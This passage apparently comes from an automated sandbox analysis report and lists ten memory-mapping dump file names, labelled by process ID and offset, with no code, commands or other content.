                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/5772-436-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/5788-437-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/5932-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/5944-441-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/5960-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/5988-444-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/6036-446-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/6072-449-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/6084-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/6116-451-0x0000000000000000-mapping.dmp